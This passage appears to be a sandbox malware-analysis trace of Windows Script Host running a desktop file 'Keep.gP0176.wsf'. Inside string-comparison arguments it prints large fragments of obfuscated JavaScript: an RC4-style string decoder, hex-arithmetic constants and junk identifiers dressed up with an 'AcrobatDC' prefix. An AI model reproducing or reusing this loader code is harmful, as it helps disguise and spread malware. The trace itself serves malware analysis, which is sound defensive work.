_Src=0xd6788ff950, _Size=0x26 | out: _Dst=0xd6788fed30) returned 0xd6788fed30 [0098.586] LoadStringW (in: hInstance=0x7ff7889d0000, uID=0x7d1, lpBuffer=0xd6788fdce0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0098.586] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0xd6788fed20*=0x0 | out: pptlib=0xd6788fed20*=0x24adf98a550) returned 0x0 [0098.602] ITypeLib:GetTypeInfoOfGuid (in: This=0x24adf98a550, GUID=0x7ff7889e6f60*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0xd6788fed08 | out: ppTInfo=0xd6788fed08*=0x24adf98add8) returned 0x0 [0098.613] ITypeInfo:GetRefTypeOfImplType (in: This=0x24adf98add8, index=0xffffffff, pRefType=0xd6788fed00 | out: pRefType=0xd6788fed00*=0xfffffffe) returned 0x0 [0098.613] ITypeInfo:GetRefTypeInfo (in: This=0x24adf98add8, hreftype=0xfffffffe, ppTInfo=0x7ff7889f2108 | out: ppTInfo=0x7ff7889f2108*=0x24adf98ae30) returned 0x0 [0098.614] IUnknown:Release (This=0x24adf98add8) returned 0x1 [0098.614] malloc (_Size=0x98) returned 0x24adfc659a0 [0098.614] malloc (_Size=0x58) returned 0x24adfc65a40 [0098.615] malloc (_Size=0x50) returned 0x24adfc65aa0 [0098.615] ITypeLib:GetTypeInfoOfGuid (in: This=0x24adf98a550, GUID=0x7ff7889e7598*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0xd6788fecd8 | out: ppTInfo=0xd6788fecd8*=0x24adf98ae88) returned 0x0 [0098.615] ITypeInfo:GetRefTypeOfImplType (in: This=0x24adf98ae88, index=0xffffffff, pRefType=0xd6788fecd0 | out: pRefType=0xd6788fecd0*=0xfffffffe) returned 0x0 [0098.615] ITypeInfo:GetRefTypeInfo (in: This=0x24adf98ae88, hreftype=0xfffffffe, ppTInfo=0x7ff7889f20c8 | out: ppTInfo=0x7ff7889f20c8*=0x24adf98aee0) returned 0x0 [0098.615] IUnknown:Release (This=0x24adf98ae88) returned 0x1 [0098.615] ITypeLib:GetTypeInfoOfGuid (in: This=0x24adf98a550, GUID=0x7ff7889e7790*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0xd6788fecd8 | out: ppTInfo=0xd6788fecd8*=0x24adf98af38) returned 0x0 [0098.615] ITypeInfo:GetRefTypeOfImplType (in: This=0x24adf98af38, index=0xffffffff, pRefType=0xd6788fecd0 | out: pRefType=0xd6788fecd0*=0xfffffffe) returned 0x0 [0098.616] ITypeInfo:GetRefTypeInfo (in: This=0x24adf98af38, hreftype=0xfffffffe, ppTInfo=0x7ff7889f2088 | out: ppTInfo=0x7ff7889f2088*=0x24adf98af90) returned 0x0 [0098.616] IUnknown:Release (This=0x24adf98af38) returned 0x1 [0098.616] ITypeLib:GetTypeInfoOfGuid (in: This=0x24adf98a550, GUID=0x7ff7889e6f70*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0xd6788fecd8 | out: ppTInfo=0xd6788fecd8*=0x24adf98afe8) returned 0x0 [0098.616] ITypeInfo:GetRefTypeOfImplType (in: This=0x24adf98afe8, index=0xffffffff, pRefType=0xd6788fecd0 | out: pRefType=0xd6788fecd0*=0xfffffffe) returned 0x0 [0098.616] ITypeInfo:GetRefTypeInfo (in: This=0x24adf98afe8, hreftype=0xfffffffe, ppTInfo=0x7ff7889f2048 | out: ppTInfo=0x7ff7889f2048*=0x24adf98b040) returned 0x0 [0098.616] IUnknown:Release (This=0x24adf98afe8) returned 0x1 [0098.616] IUnknown:Release (This=0x24adf98a550) returned 0x4 [0098.617] malloc (_Size=0x38) returned 0x24adfc65b00 [0098.617] GetCurrentThreadId () returned 0xcf4 [0098.617] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x120 [0098.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ff7889d7850, lpParameter=0x24adfc65b00, dwCreationFlags=0x0, lpThreadId=0x24adfc65b28 | out: lpThreadId=0x24adfc65b28*=0x88c) returned 0x124 [0098.618] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0xd6788fef50*=0x120, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0 [0098.721] CloseHandle (hObject=0x120) returned 1 [0098.721] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf", nBufferLength=0x104, lpBuffer=0xd6788ff040, lpFilePart=0xd6788ff038 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf", lpFilePart=0xd6788ff038*="Keep.gP0176.wsf") returned 0x29 [0098.722] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".wsf", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788fe540 | out: phkResult=0xd6788fe540*=0x142) returned 0x0 [0098.722] RegQueryValueExW (in: hKey=0x142, lpValueName=0x0, lpReserved=0x0, lpType=0xd6788fe504, lpData=0xd6788fe550, lpcbData=0xd6788fe500*=0x800 | out: lpType=0xd6788fe504*=0x1, lpData="WSFFile", lpcbData=0xd6788fe500*=0x10) returned 0x0 [0098.722] RegCloseKey (hKey=0x142) returned 0x0 [0098.722] wcscat_s (in: _Destination="WSFFile", _SizeInWords=0x40e, _Source="\\ScriptEngine" | out: _Destination="WSFFile\\ScriptEngine") returned 0x0 [0098.722] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="WSFFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788fe540 | out: phkResult=0xd6788fe540*=0x0) returned 0x2 [0098.723] LoadLibraryExW (lpLibFileName="urlmon.dll", hFile=0x0, dwFlags=0x800) returned 0x7ff864cc0000 [0098.851] GetProcAddress (hModule=0x7ff864cc0000, lpProcName="CreateURLMonikerEx") returned 0x7ff864cdf050 [0098.852] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf", ppmk=0xd6788ff028*=0x0, dwFlags=0x1 | out: ppmk=0xd6788ff028*=0x24adf995120) returned 0x0 [0098.866] CoCreateInstance (in: rclsid=0x7ff7889e69e0*(Data1=0x6290bd6, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7889e6a80*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0xd6788ffba8 | out: ppv=0xd6788ffba8*=0x0) returned 0x80040154 [0098.883] CoCreateInstance (in: rclsid=0x7ff7889e69f0*(Data1=0x6290bd0, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff7889e6a80*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0xd6788ffba8 | out: ppv=0xd6788ffba8*=0x24adfc66e78) returned 0x0 [0098.896] malloc (_Size=0x100) returned 0x24adfc66a10 [0098.896] __dllonexit () returned 0x7ff8598dbd60 [0098.896] __dllonexit () returned 0x7ff8598dbd80 [0098.897] GetVersionExA (in: lpVersionInformation=0xd6788fc980*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ff8, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x598dbd80, szCSDVersion="ø\x7f") | out: lpVersionInformation=0xd6788fc980*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0098.897] GetProcessWindowStation () returned 0xc0 [0098.898] GetUserObjectInformationA (in: hObj=0xc0, nIndex=1, pvInfo=0xd6788fc968, nLength=0xc, lpnLengthNeeded=0xd6788fc960 | out: pvInfo=0xd6788fc968, lpnLengthNeeded=0xd6788fc960) returned 1 [0098.898] malloc (_Size=0x48) returned 0x24adfc66b20 [0098.898] malloc (_Size=0x20) returned 0x24adfc66b70 [0098.898] malloc (_Size=0x38) returned 0x24adfc66ba0 [0098.898] malloc (_Size=0x38) returned 0x24adfc66be0 [0098.898] malloc (_Size=0x38) returned 0x24adfc66c20 [0098.898] malloc (_Size=0x38) returned 0x24adfc66c60 [0098.898] malloc (_Size=0x38) returned 0x24adfc66ca0 [0098.898] malloc (_Size=0x38) returned 0x24adfc66ce0 [0098.898] malloc (_Size=0x38) returned 0x24adfc66d20 [0098.898] malloc (_Size=0x38) returned 0x24adfc66d60 [0098.899] malloc (_Size=0x40) returned 0x24adfc66da0 [0098.899] free (_Block=0x24adfc66b70) [0098.899] malloc (_Size=0x38) returned 0x24adfc66df0 [0098.899] malloc (_Size=0x38) returned 0x24adfc66e30 [0098.900] DllGetClassObject (in: rclsid=0x24adf9a1f20*(Data1=0x6290bd0, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7ff86f4725a0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fd9b0 | out: ppv=0xd6788fd9b0*=0x24adfc66b70) returned 0x0 [0098.900] malloc (_Size=0x10) returned 0x24adfc66b70 [0098.901] IClassFactory:CreateInstance (in: This=0x24adfc66b70, pUnkOuter=0x0, riid=0xd6788fe880*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xd6788fd9c8 | out: ppvObject=0xd6788fd9c8*=0x24adfc66e78) returned 0x0 [0098.901] malloc (_Size=0x58) returned 0x24adfc66e70 [0098.901] malloc (_Size=0x20) returned 0x24adfc66ed0 [0098.902] IUnknown:AddRef (This=0x24adfc66e78) returned 0x2 [0098.902] IUnknown:Release (This=0x24adfc66e78) returned 0x1 [0098.902] IUnknown:Release (This=0x24adfc66b70) returned 0x0 [0098.902] free (_Block=0x24adfc66b70) [0098.902] IUnknown:QueryInterface (in: This=0x24adfc66e78, riid=0x7ff7889e6a80*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xd6788feec8 | out: ppvObject=0xd6788feec8*=0x24adfc66e78) returned 0x0 [0098.902] IUnknown:Release (This=0x24adfc66e78) returned 0x1 [0098.902] GetUserDefaultLCID () returned 0x409 [0098.902] malloc (_Size=0x18) returned 0x24adfc66b70 [0098.902] malloc (_Size=0x38) returned 0x24adfc66f00 [0098.903] CoGetClassObject (in: rclsid=0x7ff7889e6a10*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), dwClsContext=0x1, pvReserved=0x0, riid=0x7ff7889e6a00*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0xd6788fef58 | out: ppv=0xd6788fef58*=0x24adfc66f40) returned 0x0 [0098.904] DllGetClassObject (in: rclsid=0x24adf9a1f70*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0xd6788fe930*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0xd6788fdb20 | out: ppv=0xd6788fdb20*=0x24adfc66f40) returned 0x0 [0098.904] malloc (_Size=0x10) returned 0x24adfc66f40 [0098.904] IUnknown:AddRef (This=0x24adfc66f40) returned 0x2 [0098.904] IUnknown:Release (This=0x24adfc66f40) returned 0x1 [0098.905] IUnknown:QueryInterface (in: This=0x24adfc66f40, riid=0x7ff7889e6a00*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xd6788fec40 | out: ppvObject=0xd6788fec40*=0x24adfc66f40) returned 0x0 [0098.905] IUnknown:Release (This=0x24adfc66f40) returned 0x1 [0098.905] malloc (_Size=0xc0) returned 0x24adfc66f60 [0098.905] malloc (_Size=0x18) returned 0x24adfc67030 [0098.906] malloc (_Size=0x2c) returned 0x24adfc67050 [0098.906] wcscpy_s (in: _Destination=0x24adfc6706c, _SizeInWords=0x8, _Source="WScript" | out: _Destination="WScript") returned 0x0 [0098.906] malloc (_Size=0x24) returned 0x24adfc67090 [0098.906] wcscpy_s (in: _Destination=0x24adfc670ac, _SizeInWords=0x4, _Source="WSH" | out: _Destination="WSH") returned 0x0 [0098.906] CreateBindCtx (in: reserved=0x0, ppbc=0xd6788fef40 | out: ppbc=0xd6788fef40*=0x24adf9961f0) returned 0x0 [0098.906] IBindCtx:RemoteSetBindOptions (This=0x24adf9961f0, pbindopts=0xd6788fef98) returned 0x0 [0098.907] IMoniker:RemoteBindToStorage (in: This=0x24adf995120, pbc=0x24adf9961f0, pmkToLeft=0x0, riid=0x7ff8598fc9d0*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObj=0xd6788feee0 | out: ppvObj=0xd6788feee0*=0x24adf9a8b40) returned 0x0 [0098.948] malloc (_Size=0x42eac) returned 0x24ae1390080 [0099.011] malloc (_Size=0x28) returned 0x24adfc67550 [0099.016] IUnknown:Release (This=0x24adf9a8b40) returned 0x0 [0099.016] IUnknown:QueryInterface (in: This=0x24adf995120, riid=0x7ff8598fc9e0*(Data1=0xf29f6bc0, Data2=0x5021, Data3=0x11ce, Data4=([0]=0xaa, [1]=0x15, [2]=0x0, [3]=0x0, [4]=0x69, [5]=0x1, [6]=0x29, [7]=0x3f)), ppvObject=0xd6788fe5a8 | out: ppvObject=0xd6788fe5a8*=0x24adf995128) returned 0x0 [0099.017] IROTData:GetComparisonData (in: This=0x24adf995128, pbData=0xd6788fe5b0, cbMax=0x800, pcbData=0xd6788fe5a0 | out: pbData=0xd6788fe5b0*=0x66, pcbData=0xd6788fe5a0*=0x64) returned 0x0 [0099.017] IUnknown:Release (This=0x24adf995128) returned 0x1 [0099.017] malloc (_Size=0x68) returned 0x24adfc67580 [0099.017] memcpy (in: _Dst=0x24adfc67584, _Src=0xd6788fe5b0, _Size=0x64 | out: _Dst=0x24adfc67584) returned 0x24adfc67584 [0099.017] IUnknown:AddRef (This=0x24adf995120) returned 0x2 [0099.017] _strnicmp (_Str1="> (-(-0xacb + 0x1bb6 + -0x10e9) * troposphericganguela & -0x157a + -0x1 * 0xa86 + 0x2006)) : 0x1 * 0x1b17 + -0x1dd7 + 0x2c0) {\r\n fogman = equicaloricunauspicious['indexOf'](fogman);\r\n }\r\n for (var trigonous = -0x1 * -0x17b1 + 0x1ef0 + -0x36a1, clockhouse = pagurineplatyptera['length']; trigonous < clockhouse; trigonous++) {\r\n inswingsidewiper += '%' + ('00' + pagurineplatyptera['charCodeAt'](trigonous)['toString'](-0xbf9 + -0x3 * -0x1dd + 0x672))['slice'](-(-0x296 + 0x9e + -0x1 * -0x1fa));\r\n }\r\n return decodeURIComponent(inswingsidewiper);\r\n };\r\n var scotopia = function (morphizing, revisaldysprosia) {\r\n var idlemen = [], vulgarisationsursaturation = 0x7 * -0x101 + 0xbc1 + 0x2 * -0x25d, catharsetruscologist, eutrophicationlippens = '';\r\n morphizing = phryganeidpiproid(morphizing);\r\n var hydraulician;\r\n for (hydraulician = 0x224e + 0x95 * -0xb + 0x94d * -0x3; hydraulician < 0x1513 + -0x26c5 + 0x12b2; hydraulician++) {\r\n idlemen[hydraulician] = hydraulician;\r\n }\r\n for (hydraulician = 0x1d2 * 0x1 + 0x1f36 + 0x842 * -0x4; hydraulician < 0xa77 * 0x3 + 0x55 * 0x25 + -0x2aae; hydraulician++) {\r\n vulgarisationsursaturation = (vulgarisationsursaturation + idlemen[hydraulician] + revisaldysprosia['charCodeAt'](hydraulician % revisaldysprosia['length'])) % (-0x2243 + 0x42 * -0x72 + 0x72f * 0x9);\r\n catharsetruscologist = idlemen[hydraulician];\r\n idlemen[hydraulician] = idlemen[vulgarisationsursaturation];\r\n idlemen[vulgarisationsursaturation] = catharsetruscologist;\r\n }\r\n hydraulician = 0xaf9 + 0x12f1 * 0x1 + 0x446 * -0x7;\r\n vulgarisationsursaturation = 0x1 * 0x1c87 + 0x814 + -0x249b;\r\n for (var jewessboyhoods = -0x125b + 0x1be + -0x109d * -0x1; jewessboyhoods < morphizing['length']; jewessboyhoods++) {\r\n hydraulician = (hydraulician + (0x1 * -0x3d1 + -0x322 * 0x8 + 0x1ce2)) % (-0x5b * -0x1d + -0x1190 + 0x841);\r\n vulgarisationsursaturation = (vulgarisationsursaturation + idlemen[hydraulician]) % (-0x869 * 0x4 + 0xa8f + -0x2d * -0x89);\r\n catharsetruscologist = idlemen[hydraulician];\r\n idlemen[hydraulician] = idlemen[vulgarisationsursaturation];\r\n idlemen[vulgarisationsursaturation] = catharsetruscologist;\r\n eutrophicationlippens += String['fromCharCode'](morphizing['charCodeAt'](jewessboyhoods) ^ idlemen[(idlemen[hydraulician] + idlemen[vulgarisationsursaturation]) % (0x1d54 + -0x5 * 0x62 + -0x1a6a)]);\r\n }\r\n return eutrophicationlippens;\r\n };\r\n AcrobatDCplatydactylcupuliferous['husVNM'] = scotopia;\r\n chortosterolseawards = arguments;\r\n AcrobatDCplatydactylcupuliferous['FICGVK'] = !![];\r\n }\r\n var overscreamneoteristic = spacetime[-0x151 + 0x2425 + -0x3 * 0xb9c];\r\n var milliangstromminibike = isomorphicwholesomeness + overscreamneoteristic;\r\n var cankers = chortosterolseawards[milliangstromminibike];\r\n if (!cankers) {\r\n if (AcrobatDCplatydactylcupuliferous['ktBqkt'] === undefined) {\r\n AcrobatDCplatydactylcupuliferous['ktBqkt'] = !![];\r\n }\r\n chamos = AcrobatDCplatydactylcupuliferous['husVNM'](chamos, derays);\r\n chortosterolseawards[milliangstromminibike] = chamos;\r\n } else {\r\n chamos = cankers;\r\n }\r\n return chamos;\r\n };\r\n return AcrobatDCplatydactylcupuliferous(chortosterolseawards, platydactylcupuliferous);\r\n}\r\nvar AcrobatDCparadinglynonenemies = AcrobatDCtensors('0x672', '0x6ee', 0x6b0, 0x663, '0x496', '0x55f') + AcrobatDCferromagnetismlabras(0x197, 0x2b9, 0x2e0, '0x42f', 0x479, '0x3c5') + AcrobatDCcallidity('0x271', 0x19d, '3X[O', 0x45, '0x1d9', 0x219) + AcrobatDCcallidity(0xea, '0x242', 'VGt&', '0x263', '0x310', '0x23b') + 's';\r\nvar AcrobatDCoverdrily = 0x16f6 + 0x4 * -0x35b + -0x6f * 0x16;\r\nvar AcrobatDClurefulstoppages = function () {\r\n};\r\nfunction AcrobatDCcallidity(theolepticuncalcified, moonlike, acetylenation, tarapatchtyronism, pangaraimpoundment, limneticunoutspoken) {\r\n return AcrobatDCplatydactylcupuliferous(moonlike - -'0x199', acetylenation);\r\n}\r\nAcrobatDClurefulstoppages[AcrobatDCdistritos(0x5b3, 0x6f7, '0x5e1', 0x5e3, '0x47c', 0x594) + AcrobatDCcallidity(0x222, '0x8c', 'Zbfl', '0xc0', 0x78, 0x147) + 'e'] = {\r\n 'AcrobatDCaerage': function (carbonizingwinrow, gloppen, poshesthumdudgeon, unisexuallysurfiest, pentylidenecataphyllum, hotchkiss) {\r\n function frondescent(miazinedeinotherium, astrolithology, overturnablesymptoms, pathoneurosis, jeremianicunjointing, outrightlyscoffers) {\r\n return AcrobatDCdistritos(miazinedeinotherium - '0x1ee', astrolithology - 0x49, pathoneurosis - -0x2b9, pathoneurosis - 0xb4, jeremianicunjointing - 0x2f, outrightlyscoffers);\r\n }\r\n function dreamworld(collectivized, misterunreproductive, extemporiser, cryoconite, subangularitiessanitary, sculptedpreaccustoming) {\r\n return AcrobatDCaccorporate(collectivized - 0x177, subangularitiessanitary - '0x25e', extemporiser - '0x148', cryoconite, subangularitiessanitary - 0x2d, sculptedpreaccustoming - 0x154);\r\n }\r\n function literalmantric(redelessevanescent, cannongranddaddies, smokings, saillessisonym, gressoriousoutbustling, crabeating) {\r\n return AcrobatDCcallidity(redelessevanescent - '0x148', crabeating - 0x347, cannongranddaddies, saillessisonym - 0x1e6, gressoriousoutbustling - '0x1b3', crabeating - 0x168);\r\n }\r\n function prepartisan(pinklyprotovum, nonsiliceouspabulatory, pseudogenusambivalency, gargoyle, sportsmanwaning, pithiersemiditone) {\r\n return AcrobatDCtensors(pinklyprotovum - 0xe5, nonsiliceouspabulatory - 0x19d, pseudogenusambivalency - '0x49', gargoyle - 0x14b, pithiersemiditone, gargoyle - -0x342);\r\n }\r\n var dabbers = {};\r\n dabbers[dreamworld(-'0x91', '0x22e', 0xf2, 'Y!5]', '0xa2', 0x21b) + 'd'] = literalmantric(0x45b, 'rcJX', '0x42f', '0x58b', 0x31a, '0x487') + prepartisan('0x164', '0x303', '0x10d', 0x1d9, 0x159, '0xf6') + overaptness(0x47b, '0x195', 0x47b, '0x19a', '0x301', 0x260) + dreamworld(-'0x59', '0x113', -0xea, 'SzjB', '0x8c', '0x124') + prepartisan('0x26', -'0x9d', 0x23c, 0xd9, 0x1d2, '0x174') + 's';\r\n function uncrumpled(mesostomid, obstructivitypanging, ursinecrowdie, trustinglypatenting, prespecified, catheterising) {\r\n return AcrobatDCcallidity(mesostomid - '0x1db', catheterising - '0x346', ursinecrowdie, trustinglypatenting - 0x44, prespecified - 0x126, catheterising - '0xe9');\r\n }\r\n dabbers[prepartisan('0x74', -'0x55', 0x19e, '0x9a', 0x79, 0x39) + 'S'] = frondescent('0x3d4', '0x4b9', '0x46f', 0x38c, '0x377', '0x33f') + frondescent(0x5e, '0xd4', '0x2c6', '0x184', '0x2e8', '0x298');\r\n dabbers[prepartisan('0x13d', 0x21e, 0xa9, 0x16a, '0x212', '0x11b') + 'W'] = dreamworld('0x1fe', '0x12c', -0x93, 'zPGB', 0x6c, 0xc0) + frondescent(0x219, 0x215, 0x151, 0x1ac, '0x227', '0x315') + prepartisan(0x6a, -'0xef', -'0xf4', -0x28, -0x134, -0xc1) + 'es';\r\n dabbers[uncrumpled(0x51f, '0x43d', 'qm7V', '0x301', 0x237, 0x38d) + 'v'] = literalmantric(0x34c, 'NWqh', '0x582', '0x4e4', 0x2e7, 0x480) + literalmantric('0x533', 'w^NJ', '0x715', '0x7a0', '0x4f9', 0x668) + dreamworld('0x144', '0x1bd', 0x23d, 'M[Vw', 0x18f, '0x4d') + 'c';\r\n function overaptness(cigaleurolithic, headdress, cultchinflexional, seamiest, accentless, devilkin) {\r\n return AcrobatDCdistritos(cigaleurolithic - '0x1b9', headdress - '0x1e6', accentless - -'0x26e', seamiest - 0x12c, accentless - '0x93', cigaleurolithic);\r\n }\r\n dabbers[uncrumpled(0x461, 0x4c2, 'CzdC', '0x537', '0x65c', 0x4ed) + 'v'] = prepartisan('0x1a7', '0x356', '0x2e7', '0x22c', '0xcc', '0x243') + frondescent('0x2c3', 0x1f2, '0x30d', '0x34a', '0x433', '0x35b') + 'a';\r\n var triweeklies = dabbers;\r\n var wakenings = [\r\n -0x41 * -0x56 + 0x2c1 + -0x1896,\r\n triweeklies[uncrumpled('0x708', 0x413, 'NTvO', 0x713, '0x5f7', 0x58e) + 'd'],\r\n triweeklies[prepartisan('0x20c', -0x34, '0x12b', 0x9a, -0x65, -'0x8f') + 'S'],\r\n -0x1 * 0x1d03 + -0x2501 * -0x1 + -0x7fd\r\n ];\r\n var actinometrical = [\r\n triweeklies[prepartisan(0x299, -'0x9', -0x19, 0x16a, 0x64, 0x19b) + 'W'],\r\n -0x366 + -0x1df9 + -0x6ad * -0x5,\r\n -0xe09 * -0x1 + 0xe15 + -0x1c1d,\r\n triweeklies[frondescent(0x492, 0x40a, '0x32f', 0x305, '0x3b3', '0x3cd') + 'v']\r\n ];\r\n return triweeklies[dreamworld(-'0x1a', '0x65', 0x61, 'rVT%', 0x162, 0x105) + 'v'];\r\n },\r\n 'AcrobatDCSylvanesque': function (roborate, kedger, isepiptesis, paganizerhaplopetalous, junglesideconvulsions, nonprofit) {\r\n function blackjackimmeshing(beginsoxanate, acquisitions, kickiestportligature, limbernessphyllomorphosis, isopsephism, turndownsphytol) {\r\n return AcrobatDCferromagnetismlabras(beginsoxanate - '0x28', acquisitions - 0x197, acquisitions - -0xb4, limbernessphyllomorphosis - '0x1a7', isopsephism, turndownsphytol - 0x5);\r\n }\r\n var coniomyceteshabenulae = {};\r\n coniomyceteshabenulae[infrequence(-0x3, '0xcc', -'0x8a', '0x155', -'0x6b', -'0x7') + 'O'] = infrequence(-0xe1, -'0x34', 0x9f, -0x129, -0x147, '0x4b') + combinable('0x152', 0x212, '0x20b', 0x114, 0x29a, 0x205) + unsquarableorological(-0x14e, -0x14, 0xa8, -'0x146', -'0x90', 'dCXe');\r\n function unsquarableorological(nonelectrification, outfield, pleuritespirulae, durian, illuviagarrotted, homaxonicchoreographers) {\r\n return AcrobatDCaccorporate(nonelectrification - '0xb4', outfield - '0x149', pleuritespirulae - 0x198, homaxonicchoreographers, illuviagarrotted - '0x7f', homaxonicchoreographers - '0x5f');\r\n }\r\n function combinable(reexercised, collusivelyacclinal, misreports, talkiesinterstriven, omnicompetenceantical, correalityparaglenal) {\r\n return AcrobatDCferromagnetismlabras(reexercised - '0x71', collusivelyacclinal - 0xaf, reexercised - -'0x40b', talkiesinterstriven - '0x1d3', omnicompetenceantical, correalityparaglenal - '0x1a3');\r\n }\r\n function unbudgeable(endoabdominalunclify, photesthesis, idololater, tannalbin, corruptress, dinnerware) {\r\n return AcrobatDCginkgoaceae(endoabdominalunclify - '0x1b8', photesthesis - 0x33, idololater - 0x78, endoabdominalunclify, corruptress - '0xfc', corruptress - -0x25e);\r\n }\r\n coniomyceteshabenulae[ochlomaniapredemand(-'0x26', 0x1c8, 0x174, 'qm7V', 0x143, '0x1f7') + 'Z'] = blackjackimmeshing('0x254', 0x202, '0x373', 0x8f, '0x1b0', 0x16a) + infrequence('0x151', 0x2ed, '0x1e7', '0x356', '0x207', '0x22c') + unsquarableorological('0x191', 0x1f6, 0x31f, '0x2bc', '0x7b', 'rsQu') + ochlomaniapredemand(-'0x10', 0x14, -0x14c, 'Gq98', -0x12a, -'0x17c') + unsquarableorological(-0x1dc, -0xc6, '0x87', -'0x253', -0x7, '3X[O');\r\n function ochlomaniapredemand(piracies, slipcote, plaistersharlequinesque, watersideambassadorially, sarcenetsantelabium, disreportsabellan) {\r\n return " | out: _Destination="\r\n // ticklinessIntruding crissal\r\nfunction AcrobatDCXiphisura(Unfallibly, UnguidedUpdatable, StenterWoolert) {\r\n // OffuscationMimmouthedness Afforestment JuneauInnersole coradicate medullatedBoogies\r\n var AcrobatDCCainogenesis = \"PectoralistCageman\";\r\n return 'hirelings'};\r\nfunction AcrobatDCzyrenianPapacies(Intellectualization, AprilineSemidormant, ligatingLuteous, Quinolinic, Demiculverin, concipient) {\r\n // Indemnifier jactitateOptimity\r\n var AcrobatDCRutherfordine = \"virgularian\";\r\n return 'Lawyery'};\r\nfunction AcrobatDCantickt(hypermetaplasiaPrecontroversial, Magism, Soundest, coprolagnist, Caliginousness, TillaeastrumSunderment, IntereatMyasthenic) {\r\n // Lakier dionysiac spiderwort unfloundering Lambskin\r\n var AcrobatDCXenoblast = \"miserhood\";\r\n // astrophotography Helicoprotein Expletively formalized LignifyingUnimpassionedness\r\n var AcrobatDCsuprapygalAspern = [ \"Depeople\", ];\r\n var AcrobatDCWhilterSlugging = [ 3, 1, \"modellingHalurgy\", \"EnsandDetentes\", ];\r\n var AcrobatDCexaspideanUnsetting = [ \"stringmakerPhagedaenic\", \"DemihearseAphelinus\", 